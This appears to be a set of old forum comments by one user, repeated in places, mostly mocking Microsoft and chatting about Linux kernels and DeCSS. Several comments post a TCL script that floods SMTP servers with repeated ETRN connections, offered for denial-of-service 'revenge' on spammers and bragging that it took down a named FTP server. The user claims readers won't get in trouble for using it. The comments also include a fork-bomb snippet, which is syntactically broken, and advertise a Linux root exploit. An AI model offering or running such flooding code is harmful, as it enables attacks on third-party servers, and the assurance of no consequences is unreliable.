Thats why most of the net runs Apache for web-servers, and the other half runs sendmail/sendmail-clone or some other *nix based mail servers. M$ has no place in the server market because they just can't do it. Their badly coded crap can't handle the load.
Hell, run a Crey.:-) MSstate.edu has a crey, over 600 users and hardly a load. Old? ya, whatever d00d. it STILL will outperform any of the most modern highest end servers now. Load 14000 linuxs' up on it !!!! kick ass.
DoS them Back. Try this. BTW, you think you will get in trouble for it? you won't. Take my word for it, i do this all the time from my machine. It runs on TCL. I made this a few months ago. It took Anticlan.com's ftp server down. Ya, it hits HARD. Hangs the mail server sending it. Works on sendmail, and most others. This is for anyone having trouble with spammers. Save this in file and do 'tcl file', or 'tclsh file'.
If I puchase, buy, or get somthing for free I WILL do what I want to with it reguardless of what ANY corporation or government says, and I hope some company emails me about it because they will get a reply they won't like.
It figures, Microsoft can't really make a decent prduct much less make it secure. I can only imagine how many buffer overflows you will see when M$ releases their source. GO DOJ !!!!!
Some of us have probably seen this b4. Correct me if im wrong, but wasn't there a later version of the N64 running Linux? There are a few devices out there already running Linux, you maynot even know about them. Some of the GMC cars use a embeded *nix OS (not sure which ones, or which OS). The overall idea is good. But don't forget, this is not going to be a cellphone that boots up and you see lilo.
kernel 2.2.11 is running on both linuxgod.net and ws2.linuxgod.net. After 1 hour of screwing around i finally got the damn thing to compile my custom work for ATAPI/SCSI emulation. If you download it, download from ftp://ftp.us.kernel.org. I got a pretty fast download off a 56k taking 33 minutes of my wasted free time. http://www.linuxgod.net ( if im online )
As the words of Dr. Evil, Riiiiiight.
Thats why most of the net runs Apache for web-servers, and the other half runs sendmail/sendmail-clone or some other *nix based
mail servers. M$ has no place in the server market because they just can't do it. Their badly coded crap can't handle the load.
Hell, run a Crey. :-)
MSstate.edu has a crey, over 600 users and hardly a load. Old? ya, whatever d00d. it STILL will outperform any of the most modern highest end servers now. Load 14000 linuxs' up on it !!!! kick ass.
M$ Sysadmins don't need crap. Chimps get paid to click buttons at NASA. Maybe we should give the M$ sysadmins banannas.
No, they don't need anything. A monkey could get paid for clicking buttons all day. Chimps get paid to do that at NASA.
I hate that site, thats why iv firewalled off
doubleclick.net from my LAN. Keeps a lot of
those annoying spammers out too.
http://www.linuxgod.net/ and http://ws.linuxgod.net/ DeCSS WILL stay around.
DoS them Back. Try this. BTW, you think you will get in trouble for it? you won't. Take my word for it, i do this all the time from my machine. It runs on TCL. I made this a few months ago.
..."
It took Anticlan.com's ftp server down. Ya, it
hits HARD. Hangs the mail server sending it.
Works on sendmail, and most others. This is for
anyone having trouble with spammers. Save this
in file and do 'tcl file', or 'tclsh file'.
--------------------CUT HERE------------------
set flood_count 2000
set curr_count 30
proc do_port { host port } {
puts stdout "Flooding $host:$port
if {![catch {socket $host $port} sockfd]} {
puts stdout "CONNECTED.. "
puts stdout "SENDING SHIT.. "
puts $sockfd "ETRN x"
puts stdout "DONE!"
} else {
puts stdout "FAILED."
}
}
while {$curr_count < $flood_count} {
set curr_count [expr $curr_count + 1]
do_port server 25
}
----------------UNCUT HERE------------------
To hell with MPAA, im keeping DeCSS up on my site.
I hope they contact me. I have a few things to say to them.
Its a Sony!
Me2, HAHAH, im gonna save that big penguin.
thats cool.
hell, someone open that box up, i need to
do a ping -f x.x.x.x to someone.
if anyone is interested I have a root
exploit for linux <= 2.2.15 on my. 2ndary site.
requires sendmail, but you can compile that yourself.
http://www.futuresouth.com/~linuxgod/exploits/
1 word. fork().
--------- CUT HERE --------
int main()
{
while(1);
{
{
fork()
}
}
-------- UNCUT HERE ------
You can find my copy on my main site/page at http://www.linuxgod.net.
If I puchase, buy, or get somthing for free I WILL do what I want to with it reguardless of what ANY corporation or government says, and I hope some company emails me about it because they will get a reply they won't like.
It figures, Microsoft can't really make a decent prduct much less make it secure. I can only imagine how many buffer overflows you will see when M$ releases their source. GO DOJ !!!!!
Oh lord, M$ on a cell phone? Dial a number and the phone BlueScreens. :-) I don't want a cellphone that crashes.
The name fits you. Anonymous Coward. MUAHAHA. Sorry, i don't want to pay for somthing when i can get a better OS for free.
Some of us have probably seen this b4. Correct me if im wrong, but wasn't there a later version of the N64 running Linux? There are a few devices out there already running Linux, you maynot even know about them. Some of the GMC cars use a embeded *nix OS (not sure which ones, or which OS). The overall idea is good. But don't forget, this is not going to be a cellphone that boots up and you see lilo.
kernel 2.2.11 is running on both linuxgod.net and ws2.linuxgod.net. After 1 hour of screwing around i finally got the damn thing to compile my custom work for ATAPI/SCSI emulation. If you download it, download from ftp://ftp.us.kernel.org. I got a pretty fast download off a 56k taking 33 minutes of my wasted free time. http://www.linuxgod.net ( if im online )
Will this new version of UnrealUT support 3dfx cards such as the new Voodoo3 2000 pci? jd@linuxgod.net